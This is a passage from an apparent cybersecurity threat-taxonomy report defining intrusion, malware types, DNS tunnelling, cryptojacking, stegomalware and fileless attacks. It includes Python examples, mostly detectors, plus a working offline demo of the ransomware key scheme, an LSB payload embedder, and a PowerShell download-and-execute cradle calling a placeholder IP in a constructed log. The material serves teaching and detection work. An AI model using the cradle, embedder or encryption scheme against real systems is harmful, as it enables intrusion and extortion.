applies to cyberspace. The "Tallinn Manual on the International Law Applicable to Cyber Warfare" is an influential resource for legal advisers dealing with cyber issues. The drafting of the Tallinn Manual 2.0 was facilitated and led by the NATO Cooperative Cyber Defence Centre of Excellence69.

6.14 Intrusion (computer)

Nomenclature: Intrusion is to compromise a computer system by breaking the security of such a system or causing it to enter into an insecure state. Network intrusion is any unauthorized activity on a computer network.

Examples: Computer intrusion is a US federal crime governed by the following laws:
U.S. Code 18 Section 1029 – Access Device Fraud
U.S. Code 18 Section 1030 – Computer Fraud
U.S. Code 18 Section 1362 – Communication Interference
U.S. Code 18 Section 2510 – Wire and Electronic Communications Interception and Interception of Oral Communications
U.S. Code 18 Section 2701 – Unlawful Access to Stored Communications
U.S. Code 18 Section 3121 – Recording of Dialing, Routing, Addressing and Signaling Information

Usage: The act of computer intrusion, or gaining unauthorized access to a system, typically leaves traces that can be discovered by intrusion detection systems. One of the goals of intruders is to remain undetected for as long as possible so that they can continue with their malicious activity undisturbed. See also Monitoring below.

Metrics: In 2017, 6.5 percent of people were victims of identity fraud via computer intrusion, resulting in fraudsters defrauding people of about $16 billion70.

68 Cyber attacks: EU ready to respond with a range of measures, including sanctions - 06 2017 - http://www.consilium.europa.eu/en/press/press-releases/2017/06/19/cyber-diplomacy-toolbox/
69 Tallinn Manual Process - 2013 - https://ccdcoe.org/tallinn-manual.html

6.14.1 Spyware

Spyware is a type of malware (or "malicious software") that collects and shares information about a computer or network without the user's consent. It can be installed as a hidden component of genuine software packages or via traditional malware vectors such as deceptive ads, websites, email, instant messages, as well as direct file-sharing connections.

6.14.2 Malvertising

Malvertising, or malicious advertising, is the use of online, malicious advertisements to spread malware and compromise systems. Generally, this occurs through the injection of unwanted or malicious code into ads. Malicious actors then pay legitimate online advertising networks to display the infected ads on various websites, exposing every user visiting these sites to the potential risk of infection. Generally, the legitimate advertising networks and websites are not aware they are serving malicious content.

6.14.3 Clickjacking

Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top-level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.

6.14.4 Grayware

Grayware is a more succinct name for "potentially unwanted programs". It is not a virus and it is not as obviously malicious as a lot of other problematic code floating around on the Internet.
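The layered-frame attack only works if the target page can be loaded inside a frame on the attacker's origin, so the practical check is whether the response forbids framing. The following is an added example, not code from the report: it classifies a response's framing policy from its headers, giving Content-Security-Policy frame-ancestors precedence over X-Frame-Options (browsers that implement frame-ancestors ignore X-Frame-Options when both are present) and treating the obsolete ALLOW-FROM value as no protection. The sample responses belong to a hypothetical application and are constructed.

```python
"""Clickjacking exposure check from response headers. Added example; the
responses are constructed for a hypothetical web application."""


def framing_policy(headers: dict) -> str:
    """Return 'deny', 'self', 'allowlist' or 'none' (framable by any origin).

    CSP frame-ancestors wins over X-Frame-Options when both are present."""
    lower = {name.lower(): value for name, value in headers.items()}
    for directive in lower.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            sources = [t.lower() for t in tokens[1:]]
            if not sources or sources == ["'none'"]:
                return "deny"
            if sources == ["'self'"]:
                return "self"
            return "allowlist"
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "deny"
    if xfo == "SAMEORIGIN":
        return "self"
    # ALLOW-FROM is obsolete and ignored by current browsers: no protection.
    return "none"


def framable_pages(responses: dict) -> list:
    """Names of responses that any origin can frame, i.e. clickjacking candidates."""
    return sorted(name for name, hdrs in responses.items()
                  if framing_policy(hdrs) == "none")


# Constructed responses from a hypothetical web application.
SAMPLE_RESPONSES = {
    "/account/transfer": {"Content-Type": "text/html"},
    "/login": {"X-Frame-Options": "SAMEORIGIN"},
    "/admin": {"X-Frame-Options": "SAMEORIGIN",
               "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "/widget": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "/legacy": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
}

if __name__ == "__main__":
    print("framable by any origin:", framable_pages(SAMPLE_RESPONSES))
```

The hardened form of the first response is simply `Content-Security-Policy: frame-ancestors 'none'` (plus `X-Frame-Options: DENY` for older browsers); a page that legitimately needs embedding by a partner gets the allowlist form shown for /widget rather than no header at all.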

70 Cyber Security Statistics - 02 2018 - https://thebestvpn.com/cyber-security-statistics-2018/

6.14.5 Backdoors

A backdoor is a means to access a computer system or encrypted data that bypasses the system's customary security mechanisms. A software or web application developer may create a backdoor so that an application or operating system can be accessed for troubleshooting or other purposes.

6.14.6 Adware

Adware is the name given to programs that are designed to display advertisements on your computer, redirect your search requests to advertising websites and collect marketing-type data about you, for example the types of websites that you visit, so that customised adverts can be displayed. In 2016, adware affected around 75 percent of organizations in 13 countries71.

6.15 Cryptovirology

Nomenclature: Cryptovirology is the study of the applications of cryptography to malicious software.

Examples: An example of a virus that informs the owner of the infected machine to pay a ransom is the virus nicknamed Tro_Ransom.A. This virus asks the owner of the infected machine to send $10.99 to a given account through Western Union. Virus.Win32.Gpcode.ag is a classic cryptovirus. This virus partially uses a version of 660-bit RSA and encrypts files with many different extensions. It instructs the owner of the machine to email a given mail ID if the owner desires the decryptor. If contacted by email, the user will be asked to pay a certain amount as ransom in return for the decryptor72.

Usage: Cryptovirological attacks. Traditionally, cryptography and its applications are defensive in nature, and provide privacy, authentication, and security to users. Cryptovirology is used offensively, primarily to mount extortion-based attacks that cause loss of access to information, loss of confidentiality, and information leakage, tasks which cryptography typically prevents. The field studies the potential threats and attacks that rogue use of cryptography can cause when combined with rogue software (viruses, Trojan horses). Public-key cryptography is essential to the asymmetric attacks73.

Metrics: Mostly cryptovirology is seen via cryptoviral extortion and by file-encrypting ransomware (see 6.7 above). It is a 3-step process:
● The attacker generates a key pair, and the corresponding public key is placed in the malware. The malware is then released to the victim.
● The malware generates a random symmetric key and encrypts the victim's files and data with it. Further, the symmetric key is encrypted using the public key in the malware. This results in a small asymmetric ciphertext as well as the ciphertext of the victim's data. A message is displayed to the user that includes the asymmetric ciphertext and how to pay the ransom. The victim sends the asymmetric ciphertext along with the payment amount to the attacker.
● The attacker deciphers the asymmetric ciphertext on receiving the payment with their (attacker's) private key. Now the attacker sends the symmetric key to the victim. The victim decrypts the encrypted data, thereby completing the cryptovirology attack74.

71 Adware - http://www.grouppbs.com/wp-content/uploads/2017/02/Cisco_2017_ACR_PDF.pdf
72 Cryptovirology - Examples of Viruses With Cryptography and Ransom Capabilities - 2015 - http://www.liquisearch.com/cryptovirology/examples_of_viruses_with_cryptography_and_ransom_capabilities
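The three steps above, run end to end, as an added example that is not code from the report or from any real sample. Textbook RSA with freshly generated 256-bit primes stands in for the 660-bit RSA the report attributes to Gpcode, and a SHA-256 keystream stands in for the symmetric file cipher; both substitutions are assumptions of this example. What it shows is the key handling that makes the extortion work: the only key material ever present on the victim is the public key, so the asymmetric ciphertext cannot be opened from anything left on the machine, and a different private key yields garbage.

```python
"""Cryptoviral extortion, three steps, offline. Added example: textbook RSA
and a SHA-256 keystream are stand-ins for the RSA/AES of a real cryptovirus."""
import hashlib
import secrets


def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin, adequate for a demonstration key."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(candidate):
            return candidate


def attacker_keypair(bits: int = 512):
    """Step 1: the attacker makes (n, e) and (n, d); only (n, e) ships in the malware."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))


def _keystream_xor(key: bytes, data: bytes) -> bytes:
    """Symmetric cipher stand-in: XOR with SHA-256(key || block counter).
    XOR is its own inverse, so the same call decrypts."""
    out = bytearray()
    for block, offset in enumerate(range(0, len(data), 32)):
        stream = hashlib.sha256(key + block.to_bytes(8, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], stream))
    return bytes(out)


def malware_encrypt(public_key, files: dict):
    """Step 2, on the victim: fresh symmetric key, files encrypted with it, the key
    encrypted to the attacker's public key and then dropped from memory."""
    n, e = public_key
    sym_key = secrets.token_bytes(32)                 # 256 bits, always < n here
    asym_ct = pow(int.from_bytes(sym_key, "big"), e, n)
    encrypted = {name: _keystream_xor(sym_key, data) for name, data in files.items()}
    del sym_key                                       # nothing recoverable stays behind
    return asym_ct, encrypted


def attacker_release_key(private_key, asym_ct: int) -> bytes:
    """Step 3, attacker side, after payment: the private exponent recovers the key."""
    n, d = private_key
    m = pow(asym_ct, d, n)
    return m.to_bytes(max(32, (m.bit_length() + 7) // 8), "big")


def victim_decrypt(sym_key: bytes, encrypted: dict) -> dict:
    return {name: _keystream_xor(sym_key, data) for name, data in encrypted.items()}


def run_protocol(files: dict, keys=None) -> dict:
    """Whole round trip; returns the files as the victim sees them after paying."""
    public_key, private_key = keys or attacker_keypair()
    asym_ct, encrypted = malware_encrypt(public_key, files)
    return victim_decrypt(attacker_release_key(private_key, asym_ct), encrypted)


if __name__ == "__main__":
    sample = {"report.docx": b"quarterly numbers", "notes.txt": b""}   # constructed
    print(run_protocol(sample) == sample)
```

For the defender the consequence is the one the report's 1996 reference draws: once step 2 has completed, recovery depends on the attacker's private key, so the useful interventions are before it (blocking the dropper) or during it (the symmetric key is in process memory while files are being encrypted).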

6.16 Malicious software (badware)

Nomenclature: Badware is software that fundamentally ignores the user's wishes about how to use his computer or network connection. It can include both malware (viruses, spyware etc.), or a BHO (Browser Helper Object) that secretly sends information about the user to the company, or (non-destructive) software that is installed without the user's knowledge, along with other software.

Examples: Bundled installers are a common way to get infected with unsolicited BHOs. These bundles are designed to install more than the user bargained for and usually include one or more BHOs that function as adware and/or hijackers. Lenovo preinstalled Superfish adware on its laptops, which would inject its own shopping results into the browser when you searched on Google, Amazon, and other websites. Superfish is the most virulent adware75.

Usage: Very common BHOs of the potentially unwanted kind are from the families Mindspark/Ask (toolbars), Browsefox aka Sanbreel (bundled adware), Crossrider (bundled adware), and Conduit/SearchProtect (hijackers).

Metrics: Sony's DRM (Digital Rights Management) rootkit (badware): Sony BMG Music Entertainment distributed a copy-protection scheme with music CDs that secretly installed a rootkit on computers. The Sony code modified Windows, a process called "cloaking". It acts as spyware, sending information about the user to Sony. And it can't be removed; trying to get rid of it damages Windows. Over half a million computers worldwide are infected, making this one of the most serious internet epidemics of all time, on a par with worms like Blaster, Slammer, Code Red and Nimda76.

73 Cryptovirology: extortion-based security threats and countermeasures - 1996 - https://ieeexplore.ieee.org/document/502676/
74 Ransomware – A CryptoViral Extortion Attack - 05 2017 - http://www.tothenew.com/blog/ransomware-a-cryptoviral-extortion-attack/

6.16.1 Rootkits

A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence. The term rootkit is a combination of the two words "root" and "kit". Originally, a rootkit was a collection of tools that enabled administrator-level access to a computer or network. Root refers to the admin account on Unix and Linux systems, and kit refers to the software components that implement the tool. Today rootkits are generally associated with malware (such as Trojans, worms, viruses) that conceals its existence and actions from users and other system processes.

6.16.2 Bootkits

A bootkit is similar to a rootkit in that it serves to enable continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications. The main difference is that a bootkit infects the boot sequence of the computer. This means that instead of a common rootkit, which is a driver in the system, the code of the bootkit is injected into the master boot record of the hard disk, so the bootkit is harder to detect because it is executed before the operating system and can control everything.

75 You Had One Job, Lenovo, And it didn't involve sneaking malicious adware onto your customers' computers - 02 2015 - http://www.slate.com/articles/technology/bitwise/2015/02/lenovo_superfish_scandal_why_it_s_one_of_the_worst_consumer_computing_screw.html
76 Sony's DRM Rootkit: The Real Story - 2005 - https://www.schneier.com/blog/archives/2005/11/sonys_drm_rootk.html

6.16.3 Keyloggers

A keylogger, sometimes called a keystroke logger or system monitor, is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard. Keylogger software is also available for use on smartphones, such as Apple's iPhone and Android devices.

6.16.4 Software used for illegal purposes

6.16.4.1 Riskware

Riskware is the name given to legitimate programs that can cause damage if they are exploited by malicious users in order to delete, block, modify or copy data, and disrupt the performance of computers or networks.

6.16.4.2 Crack

A crack (illegal purposes) is commonly applied to the files used in software cracking programs, which enable illegal copying and use of commercial software, and unauthorized downloading of commercial media (films, videos, music etc.), by breaking (or cracking) various registration and copy-protection techniques.

6.16.4.3 Keygen

Keygen (key generator) properly refers to a program that generates registration or licence keys for commercial software and is used together with cracks; the term is also applied loosely to password cracking, the various measures used to discover computer passwords. This is usually accomplished by recovering passwords from data stored in, or transported from, a computer system, or by repeatedly guessing the password (brute force), usually through a computer algorithm in which the computer tries numerous combinations until the password is successfully discovered. Password cracking can be done for several reasons, but the most malicious reason is to gain unauthorized access to a computer without the computer owner's awareness. In cybercrime terms this results in stealing passwords for the purpose of accessing banking information, encrypted documents, protected media etc.

6.17 DNS tunnelling

Nomenclature: DNS tunnelling is a method of cyber-attack that encodes the data of other programs or protocols in DNS queries and responses. DNS tunnelling often includes data payloads that can be added to an attacked DNS server and used to control a remote server and applications.

Examples: Typically, DNS tunnelling requires the compromised system to have external network connectivity, as DNS tunnelling requires access to an internal DNS server with network access. Attackers must also control a domain and a server that can act as an authoritative server in order to execute the server-side tunnelling and data payload executable programs.

Usage: Some examples of attacks that can use DNS tunnelling include any type of attack that requires firewall evasion and a command and control server. This would help the attacker send and receive commands against a computerized system, bypassing the firewall.

Metrics: Not applicable.
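Because the tunnel has to push its payload through the query name, it leaves a recognisable footprint in resolver logs: a stream of never-repeating, long, high-entropy subdomains under one registered domain, often as TXT or NULL queries. The following is an added example, not code from the report, that scores those four signals per registered domain over BIND-style query-log lines. The log is constructed; the six tunnel labels are built so that every hex digit occurs equally often, which is how an encoded payload looks to an entropy measure. Registered-domain extraction takes the last two labels (no public-suffix list), an assumption that would need fixing for co.uk-style TLDs.

```python
"""Heuristic DNS tunnelling detection over resolver query logs. Added example
with a constructed log; see the lead-in for the assumptions."""
import math
import re
from collections import defaultdict

LOG_RE = re.compile(r"client (\S+)#\d+: query: (\S+) IN (\S+)")
RARE_TYPES = {"TXT", "NULL"}          # record types with room for a payload


def shannon_entropy(text: str) -> float:
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Last two labels; assumption, no public-suffix list."""
    return ".".join(qname.split(".")[-2:])


def profile(lines):
    """Aggregate per registered domain the signals a tunnel leaves behind."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "length": 0, "entropy": 0.0, "rare": 0})
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        _client, qname, qtype = match.groups()
        qname = qname.rstrip(".").lower()
        domain = registered_domain(qname)
        sub = qname[:-len(domain)].rstrip(".")
        s = stats[domain]
        s["queries"] += 1
        s["subdomains"].add(sub)
        s["length"] += len(qname)
        s["entropy"] += shannon_entropy(sub.replace(".", ""))
        s["rare"] += qtype.upper() in RARE_TYPES
    return stats


def detect_tunnelling(lines, min_queries=5, min_signals=3) -> dict:
    """Domains showing at least min_signals of the four signals -> reasons."""
    findings = {}
    for domain, s in profile(lines).items():
        q = s["queries"]
        if q < min_queries:
            continue
        reasons = []
        if len(s["subdomains"]) / q >= 0.9:
            reasons.append("almost every query uses a new subdomain")
        if s["entropy"] / q > 3.5:
            reasons.append("high-entropy labels")
        if s["length"] / q > 40:
            reasons.append("long query names")
        if s["rare"] / q > 0.5:
            reasons.append("mostly TXT/NULL queries")
        if len(reasons) >= min_signals:
            findings[domain] = reasons
    return findings


# Constructed log: ordinary traffic plus six TXT queries carrying hex chunks in
# which each hex digit appears exactly twice (uniform symbol distribution).
_CHUNKS = ["f3a9c1e7b5d20486" "2e8c0b6d4f1a3957", "7d1f5b93ce0a4862" "a4e26c08b9f1d375",
           "9c3e7a1f5b0d2846" "06b4d8f2a3c5e791", "2e8c0b6d4f1a3957" "7d1f5b93ce0a4862",
           "a4e26c08b9f1d375" "9c3e7a1f5b0d2846", "06b4d8f2a3c5e791" "f3a9c1e7b5d20486"]
SAMPLE_LOG = [
    "client 10.0.0.5#51234: query: www.example.com IN A",
    "client 10.0.0.5#51235: query: www.example.com IN AAAA",
    "client 10.0.0.7#41000: query: mail.example.com IN MX",
    "client 10.0.0.7#41001: query: www.example.com IN A",
    "client 10.0.0.9#33000: query: cdn.example.com IN A",
    "client 10.0.0.9#33001: query: _dmarc.example.com IN TXT",
    "client 10.0.0.9#33002: query: www.google.com IN A",
] + [f"client 10.0.0.12#4{i:04d}: query: {chunk}.t.example-tunnel.net IN TXT"
     for i, chunk in enumerate(_CHUNKS)]

if __name__ == "__main__":
    for domain, why in detect_tunnelling(SAMPLE_LOG).items():
        print(domain, "->", "; ".join(why))
```

The thresholds are deliberately coarse; in production the per-domain counters would be kept over a sliding window and content-delivery domains with many short-lived hostnames would need an allowlist, since they trip the first signal on their own.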


6.18 Domain abuse

Nomenclature: Domain abuse is the abuse of domain name registration, where the domain is used for security-threatening behaviour across top-level domain (TLD) registries and registrars.

Examples: See Table 5-2: Most abused GTLDs.

Usage: Domains obtained and used for spam, phishing, drive-by malware downloads, botnet C&Cs, malvertising, etc.

Metrics: DAAR (Domain Abuse Activity Reporting), a system operated by ICANN for reporting on domain name registration and abuse data across TLD registries and registrars. Based on legacy and new GTLDs, abusive live domains in Oct 2017 (rounded numbers)77:

● Spam - 2,000,000
● Phishing - 60,000
● Malware - 72,000
● Botnets - 18,000

Top Level Domain (TLD) registries which allow registrars to sell high numbers of domains to professional spammers, malware operators and bot herders in essence aid abuse on the Internet. Some registrars and re-sellers knowingly sell high numbers of domains to these bad actors for profit, and many registries do not do enough to stop or limit this endless supply of domains (see Figure 6.4 below). In defining a TLD "badness" index, Spamhaus used a weight for both of these factors. With a certain amount of arbitrariness, and at the same time a desire to avoid excessive complications, Spamhaus defined badness as:

$\text{badness} = \frac{D_b}{D_t} \cdot \log(D_b)$

where $D_b$ is the number of bad domains detected and $D_t$ is the number of active domains observed.
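The log factor is what separates this index from a plain bad-domain ratio: a tiny TLD where five of six domains are bad has the higher ratio, but a TLD with 500 bad domains out of 1,000 is the bigger problem. The following is an added example, not from the report or from Spamhaus, that ranks a set of constructed (D_b, D_t) pairs both ways. The report does not state the logarithm's base, so the natural log is assumed; any base only rescales every score by the same constant, so the ranking is unchanged.

```python
"""Spamhaus badness index, badness = (Db / Dt) * log(Db), versus a plain ratio.
Added example with constructed TLD counts; natural log assumed."""
import math


def badness(bad_domains: int, active_domains: int) -> float:
    """(Db / Dt) * log(Db). Zero bad domains scores 0 rather than log(0)."""
    if active_domains <= 0:
        raise ValueError("Dt must be positive")
    if bad_domains <= 0:
        return 0.0
    return (bad_domains / active_domains) * math.log(bad_domains)


def bad_ratio(bad_domains: int, active_domains: int) -> float:
    return bad_domains / active_domains


def rank(tlds: dict, scorer=badness) -> list:
    """TLDs ordered worst first by scorer(Db, Dt)."""
    return sorted(tlds, key=lambda tld: scorer(*tlds[tld]), reverse=True)


# Constructed (Db, Dt) pairs: a small TLD that is mostly bad, a mid-sized one
# with a large absolute count, a huge legacy TLD with a tiny fraction, a clean one.
SAMPLE_TLDS = {
    ".tiny":   (5, 6),
    ".mid":    (500, 1000),
    ".legacy": (50_000, 10_000_000),
    ".clean":  (0, 20_000),
}

if __name__ == "__main__":
    print("by ratio:  ", rank(SAMPLE_TLDS, bad_ratio))
    print("by badness:", rank(SAMPLE_TLDS))
```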

77 ICANN DAAR Report - Oct 2017 - https://www.icann.org/en/system/files/files/presentation-daar-31oct17-en.pdf

Figure 6.4: Most abused GTLDs – Jan 2019 78

78 The World's Most Abused TLDs - https://www.spamhaus.org/statistics/tlds/

7 Indicators - Emerging Threats (Examples)

Threat advisories announce new vulnerabilities that can lead to emerging incidents, allied to which is the use of new or blended technological methods. These are published as soon as possible in order to help anyone better secure their devices or systems. Best practice for cyber security is a hybrid approach: keeping up with rapid advancements in cyber threats requires roles that go beyond what is feasible for an in-house security team to provide. The key to awareness and defence / prevention of emerging threats is CTI (Cyber Threat Intelligence) and threat sharing (see section 10 below). According to the Information Security Forum, there are five dominant security threats that businesses need to prepare for in 2018. These include, but are not limited to79:

● Crime-As-A-Service (CaaS) Expands Tools and Services
● The Internet of Things (IoT) Adds Unmanaged Risks
● Supply Chain Remains the Weakest Link in Risk Management
● Regulation Adds to Complexity of Critical Asset Management
● Unmet Board Expectations Exposed by Major Incidents

7.1 Cryptojacking

Nomenclature: Cryptojacking is the unauthorized use of someone else's computer to mine cryptocurrency. Hackers do this by either getting the victim to click on a malicious link in an email that loads crypto mining code on the computer, or by infecting a website or online ad with JavaScript code that auto-executes once loaded in the victim's browser.

Examples: Coinhive, with its ready-made scripts, needs a lower skill-set than early examples. WannaMine uses the EternalBlue exploit, the same network-spreading capabilities as WannaCry. Smominru.

Usage: Cryptojacking can be file-based or browser-based. Use via browsers enables even fully patched machines to become victims. Malicious payloads are injected into compromised websites. Its success is dependent on the popularity of cryptocurrencies.

Metrics: Cryptojacking is estimated to affect over 10 million web users every month. Researchers built a behaviour-based detector, CMTracker, to automatically track cryptocurrency mining scripts and related domains. It successfully discovered 2,770 unique cryptojacking samples from 853,936 popular web pages, including 868 among the top 100K in the Alexa list80.

In 30 days a coin-mining botnet can make $30k (browser-based) and $750k (file-based)81.

79 The Top Five Global Cyber Security Threats for 2018 - 01 2018 - https://www.cso.com.au/article/632468/top-five-global-cyber-security-threats-2018/
80 http://www.cs.ucr.edu/~zhiyunq/pub/ccs18_cryptojacking.pdf
81 https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-cryptojacking-modern-cash-cow-en.pdf

7.2 Stegomalware (Stegware)

Nomenclature: Stegomalware is a type of malware that uses steganography to hinder detection (steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video). This type of malware operates by building a stegosystem to hide a malicious component within its resources and then extracts and executes it dynamically. It is considered one of the most sophisticated and stealthy ways of obfuscation. Over the past year (2017) steganography has been used in malware programs and cyber espionage tools going by the names of Microcin, NetTraveler and Invoke-PSImage82.

Examples: Recently, stegomalware has been used in the following malware programs and cyber espionage tools:
● Microcin (AKA six little monkeys)
● NetTraveler
● Zberp
● Enfal (its new loader called Zero.T)
● Shamoon
● KinS
● ZeusVM
● Triton (Fibbit)
In 2016, the Sundown exploit kit used PNG files to hide exploit code.

Usage: Stegomalware is now very popular with malware writers; anti-malware tools generally and perimeter security tools specifically can do very little with payload-filled carriers. Such carriers are very difficult to detect, as they look like regular image files or other types of files. All steganography detection programs today are essentially proof-of-concept, and their logic cannot be implemented in commercial security tools because they are slow and have fairly low detection rates83. "Stegware" hacking tools are now common on Dark Web hacker forums, suggesting an uptick of threats used in the wild.

Metrics: Shamoon malware attacks against Gulf state organizations. These attacks occurred in November 2016 and January 2017. 4,200 computers were destroyed at the headquarters of Saudi Arabia's General Authority of Civil Aviation84.
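A minimal stegosystem of the kind described in the Nomenclature column, as an added example that is not code from the report or from any of the families listed: a payload is written into the least-significant bit of each byte of an 8-bit greyscale pixel buffer and read back. The carrier is a constructed 64x64 gradient and the payload an arbitrary byte string. The carrier keeps its size and no pixel moves by more than one level, which is why such files pass as ordinary images to size and format checks; a clean image yields no valid length header, so extraction returns None.

```python
"""LSB steganography: embed a length-prefixed payload in a pixel buffer and
extract it again. Added example with a constructed carrier and payload."""


def embed_lsb(carrier: bytes, payload: bytes) -> bytes:
    """Write a 32-bit big-endian length then the payload, one bit per carrier byte."""
    message = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in message for i in range(8)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    for index, bit in enumerate(bits):
        out[index] = (out[index] & 0xFE) | bit
    return bytes(out)


def _read_bits(carrier: bytes, start: int, n_bytes: int) -> bytes:
    value = 0
    for i in range(n_bytes * 8):
        value = (value << 1) | (carrier[start + i] & 1)
    return value.to_bytes(n_bytes, "big")


def extract_lsb(carrier: bytes):
    """Recover the payload, or None if the length header does not fit the carrier
    (the usual result on a clean image)."""
    if len(carrier) < 32:
        return None
    length = int.from_bytes(_read_bits(carrier, 0, 4), "big")
    if 32 + length * 8 > len(carrier):
        return None
    return _read_bits(carrier, 32, length)


def max_pixel_change(original: bytes, modified: bytes) -> int:
    return max(abs(a - b) for a, b in zip(original, modified))


# Constructed carrier: 64x64 greyscale gradient, one byte per pixel.
CARRIER = bytes((x + y) % 256 for y in range(64) for x in range(64))
PAYLOAD = b"hidden configuration block"   # constructed payload

if __name__ == "__main__":
    stego = embed_lsb(CARRIER, PAYLOAD)
    print(extract_lsb(stego), max_pixel_change(CARRIER, stego))
```

Detection of this scheme works on the statistics the embedding disturbs (the LSB plane becomes uniformly random, pairs of adjacent pixel values equalise), not on the file format, which is the reason the Usage column gives for the poor showing of signature-based tools against such carriers.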

The concept of stegomalware was first introduced by researchers in the context of mobile malware and presented at the Inscrypt conference in 201485. The use of steganography in malware was first applied to botnets communicating over probabilistically unobservable channels and then extended to other components of malware engineering such as Return Oriented Programming and Compile Time programming, among others.

82 USE OF 'STEGWARE' INCREASES IN STEALTH MALWARE ATTACKS - 19 04 2018 - https://threatpost.com/use-of-stegware-increases-in-stealth-malware-attacks/131293/
83 Steganography in contemporary cyberattacks - https://securelist.com/steganography-in-contemporary-cyberattacks/79276/
84 Shamoon: How the Devastating Malware Was Inserted into Networks - https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/

7.3 Fileless malware attacks

Nomenclature: Unlike attacks carried out using traditional malware, fileless malware attacks don't entail attackers installing software on a victim's machine. Instead, tools that are built in to Windows are hijacked by adversaries and used to carry out attacks. Essentially, MS Windows is turned against itself.

Examples: Malicious MS Office macros with no signature for antivirus software to detect. Malicious email attachments, often undetectable by anti-virus or spam checks, were "docm" files (a type of Microsoft Word XML file that executes macros).

Usage: For example, for distributing the Dridex banking trojan.

Metrics: During 2015, theft caused by fileless malware, e.g. Dridex, was estimated at €25 million in the United Kingdom and €15 million in the United States. By 2015, Dridex attacks had been detected in more than 20 countries. In early September 2016, Dridex was spotted targeting cryptocurrency wallets86.

The fact that traditional malware isn't used is an important point. This means that there's no signature for antivirus software to detect, greatly decreasing the effectiveness of these programs in detecting fileless malware attacks. And while next-generation security products claim to detect malicious PowerShell activity, the reality is that discovering fileless malware attacks is very challenging.
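With no file to hash, what remains for detection is the command line of the built-in tool that was hijacked, and for PowerShell that usually means a base64 `-EncodedCommand` argument. The following is an added example, not code from the report: it decodes such arguments out of process-creation log lines (base64 of UTF-16LE text) and flags the download-cradle, Invoke-Expression and hidden-window indicators in the outer command line and the decoded script. The log lines are constructed in a Sysmon-like shape and the encoded payload is produced in the block itself so the example runs offline; `powershell.exe` accepting any unambiguous prefix of `-EncodedCommand` is the reason the regex lists the short forms.

```python
"""Decode PowerShell -EncodedCommand arguments from process logs and flag
fileless-attack indicators. Added example with constructed log lines."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "download cradle": re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest"),
    "nested base64": re.compile(r"(?i)FromBase64String"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16le", errors="replace")


def analyse(lines) -> list:
    """One finding per command line that carries an encoded command."""
    findings = []
    for line in lines:
        match = ENCODED_ARG.search(line)
        if not match:
            continue
        decoded = decode_encoded_command(match.group(1))
        context = line[:match.start(1)]          # outer flags, without the base64 blob
        hits = [name for name, pattern in INDICATORS.items()
                if pattern.search(context) or pattern.search(decoded)]
        findings.append({"line": line, "decoded": decoded, "indicators": hits})
    return findings


def _enc(script: str) -> str:
    """Build an encoded command the way an attacker would (for the constructed log)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_LOG = [   # constructed, Sysmon-like
    "2019-01-12T10:02:11Z HOST01 ProcessCreate CommandLine=powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + _enc(CRADLE),
    "2019-01-12T10:05:40Z HOST02 ProcessCreate CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    "2019-01-12T10:07:03Z HOST03 ProcessCreate CommandLine=powershell.exe -EncodedCommand " + _enc("Get-Date"),
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding["decoded"], finding["indicators"])
```

The third line shows why decoding has to come before alerting: an encoded command is not in itself malicious, and a rule that fires on `-enc` alone drowns in administrative scripts. Script Block Logging (event 4104) gives the same decoded text at the source and is the better feed where it is enabled.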

7.4 Automated threats

